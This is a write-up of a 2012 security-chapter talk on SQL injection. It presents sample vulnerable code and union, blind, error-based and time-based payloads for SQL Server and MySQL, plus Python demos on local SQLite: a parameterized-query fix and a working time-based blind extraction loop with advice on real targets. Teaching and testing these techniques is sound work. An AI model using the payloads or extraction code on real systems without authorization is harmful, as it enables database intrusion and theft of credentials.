This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.
A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.
5. DEFINITION
“SQL injection is an attack in which malicious code
is inserted into strings that are later passed to [a
database] for parsing and execution.”
“The primary form of SQL injection consists of
direct insertion of code into user-input variables
that are concatenated with SQL commands and
executed.”
Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
6. SAMPLE VULNERABLE CODE
// From the MSDN article: the request parameter is concatenated straight
// into the query text, so a single quote in ShipCity ends the string
// literal and whatever follows is parsed and executed as SQL.
var _shipCity = Request.form("ShipCity");
var sql = "select * from OrdersTable" +
" where ShipCity = " +
"'" + _shipCity + "'";
Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
7. CATEGORIES OF SQL INJECTION
Normal: UNION queries (results come back in the page)
Blind: Boolean expressions (only a true/false difference in the response)
Error-based: valid syntax that throws exceptions (data comes back in the error text)
Time-based: resource-intensive or sleep-style queries (data comes back as response time)
8. EXAMPLES – NORMAL INJECTION
var sql = "select ShipCity, Dest from Orders" +
" where ShipCity = '"+_shipCity+"'";
Inject (the UNIONed SELECT must return the same number of columns as the original query, here two; the trailing -- - comments out the application's closing quote):
' UNION <data you want to extract> -- -
Example:
select ShipCity, Dest from Orders where
ShipCity='' UNION select Username, Password
from Users -- -'
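The concatenated query from the sample-vulnerable-code slide and the UNION payload above, run against a throwaway in-memory SQLite database, as an added example (not code from the talk or from the MSDN article). The tables OrdersTable and Users, their two-column layout and the rows in them are constructed for the demo so that the UNIONed SELECT lines up with the original column count; the parameterized version beside the vulnerable one shows the same input being treated as a plain value:

```python
import sqlite3

# Constructed sample data standing in for the application's database.
SCHEMA = """
CREATE TABLE OrdersTable (OrderId INTEGER, ShipCity TEXT);
INSERT INTO OrdersTable VALUES (1, 'Memphis'), (2, 'Redmond'), (3, 'Seattle');
CREATE TABLE Users (Username TEXT, Password TEXT);
INSERT INTO Users VALUES ('admin', 's3cr3t');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def find_orders_vulnerable(conn, ship_city):
    """The slide's construction: the request parameter is concatenated into the
    SQL text, so a quote character in it changes the structure of the query."""
    sql = "select * from OrdersTable where ShipCity = '" + ship_city + "'"
    return conn.execute(sql).fetchall()


def find_orders_parameterized(conn, ship_city):
    """Bound parameter: the SQL text is fixed and the input is only ever a value."""
    sql = "select * from OrdersTable where ShipCity = ?"
    return conn.execute(sql, (ship_city,)).fetchall()


def run_both(ship_city):
    """Send one request through both versions and return
    (rows from the vulnerable query, rows from the parameterized query)."""
    conn = make_db()
    return (find_orders_vulnerable(conn, ship_city),
            find_orders_parameterized(conn, ship_city))


if __name__ == "__main__":
    payloads = (
        "Memphis",                                              # normal use
        "Memphis' or '1'='1",                                   # tautology: every order
        "' UNION select Username, Password from Users -- -",    # slide's UNION payload
    )
    for payload in payloads:
        vulnerable, safe = run_both(payload)
        print("%-52r vulnerable=%r parameterized=%r" % (payload, vulnerable, safe))
```

The `-- -` at the end of the UNION payload turns the application's own closing quote into a comment, which is why the vulnerable query parses cleanly while the parameterized one simply searches for a city named after the whole payload string and finds nothing.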
9. EXAMPLES – BLIND INJECTION
var sql = "select * from Orders" +
" where ShipCity = '"+_shipCity+"'";
Inject (compare the two responses: a true expression returns the normal page, a false one returns an empty or different page):
<valid value>' and <true expression>
<valid value>' and <false expression>
Example:
select * from Orders where ShipCity='Memphis'
and '1'='1'
10. EXAMPLES – ERROR-BASED INJECTION
var sql = "select * from Orders" +
" where ShipCity = '"+_shipCity+"'";
Example (SQL Server):
select * from Orders where ShipCity='' and
1=CAST(suser_name() as INT)-- -'
Example (MySQL >= 5.1.5, which added the XML functions):
select * from Orders where ShipCity='' and
ExtractValue(0,CONCAT(0x5c,(select user())))-- -'
11. EXAMPLES – TIME-BASED INJECTION
var sql = "select ShipCity, Dest from Orders" +
" where ShipCity = '"+_shipCity+"'";
Example (SQL Server):
select ShipCity, Dest from Orders where
ShipCity='' waitfor delay '0:0:10'
Example (MySQL >= 5.0.12):
select ShipCity, Dest from Orders where
ShipCity='' UNION SELECT SLEEP(5), '2'
12. TIME-BASED + BLIND
Same:
Resource intensive or sleep/wait style
functions
New:
Extract arbitrary data
Bypass business functionality
13. EXAMPLES – TIME-BASED + BLIND
var sql = "select ShipCity, Dest from Orders" +
" where ShipCity = '"+_shipCity+"'";
Example (SQL Server):
select ShipCity, Dest from Orders where
ShipCity=''; if(<boolean>) waitfor delay '0:0:10'
Example (MySQL >= 5.0.12):
select ShipCity, Dest from Orders where
ShipCity='' UNION
SELECT IF(<bool>,SLEEP(5),1), '2'
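An added example of the extraction loop that turns the conditional-delay payload above into recovered data; it is not code from the talk. The vulnerable application is simulated with the slide's concatenated query over an in-memory SQLite database (tables Orders and Users and their rows are constructed for the demo), and because SQLite has no SLEEP() or IF(), a SLEEP user-defined function is registered and the MySQL `IF(<bool>,SLEEP(5),1)` is written as an equivalent `CASE WHEN`. The search loop itself only needs a yes/no oracle, so the same `extract_string` works for the boolean blind case on the earlier slide once the oracle compares page content instead of response time; the delay is kept at 0.1 s so the demo finishes in a few seconds:

```python
import sqlite3
import time

DELAY = 0.1  # seconds the injected SLEEP() pauses; a real engagement would use several seconds


def make_vulnerable_app():
    """Return a function that runs the slide's concatenated query against an
    in-memory SQLite database seeded with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so the payload behaves as on MySQL.
    conn.create_function("SLEEP", 1, lambda seconds: time.sleep(seconds) or 0)
    conn.executescript("""
        CREATE TABLE Orders (ShipCity TEXT, Dest TEXT);
        INSERT INTO Orders VALUES ('Memphis', 'Nashville');
        CREATE TABLE Users (Username TEXT, Password TEXT);
        INSERT INTO Users VALUES ('admin', 's3cr3t');
    """)

    def app(ship_city):
        # Same construction as the slide: the parameter is concatenated into the SQL.
        sql = "select ShipCity, Dest from Orders where ShipCity = '" + ship_city + "'"
        return conn.execute(sql).fetchall()

    return app


def time_oracle(app, condition):
    """Send one request whose UNIONed row sleeps only when `condition` is true
    (the slide's MySQL payload with IF() written as CASE for SQLite) and decide
    the truth value from the response time. Nothing in the response body is used."""
    payload = ("' UNION SELECT CASE WHEN " + condition +
               " THEN SLEEP(" + str(DELAY) + ") ELSE 1 END, '2")
    start = time.monotonic()
    app(payload)
    return time.monotonic() - start >= DELAY / 2


def extract_string(oracle, subquery, max_len=64):
    """Recover the single string returned by `subquery` one character at a time
    using only yes/no answers from `oracle`. Each character costs 7 requests
    (binary search over code points 0..127); a result of 0 marks the end."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # Past the end of the string, unicode(substr(...)) is NULL, so the
            # comparison is never true and the search converges on 0.
            if oracle("unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


def dump_admin_password():
    app = make_vulnerable_app()
    return extract_string(lambda cond: time_oracle(app, cond),
                          "SELECT Password FROM Users WHERE Username = 'admin'")


if __name__ == "__main__":
    started = time.monotonic()
    print("admin password:", dump_admin_password())
    print("took %.1f s" % (time.monotonic() - started))
```

The threshold at half the delay is the usual compromise: long enough that normal query time and network jitter do not register as a "yes", short enough that a single slow response is still distinguishable. Against a real target, measure a baseline first and repeat any request whose timing falls near the threshold, since one misread bit corrupts the character and everything extracted after it still looks plausible.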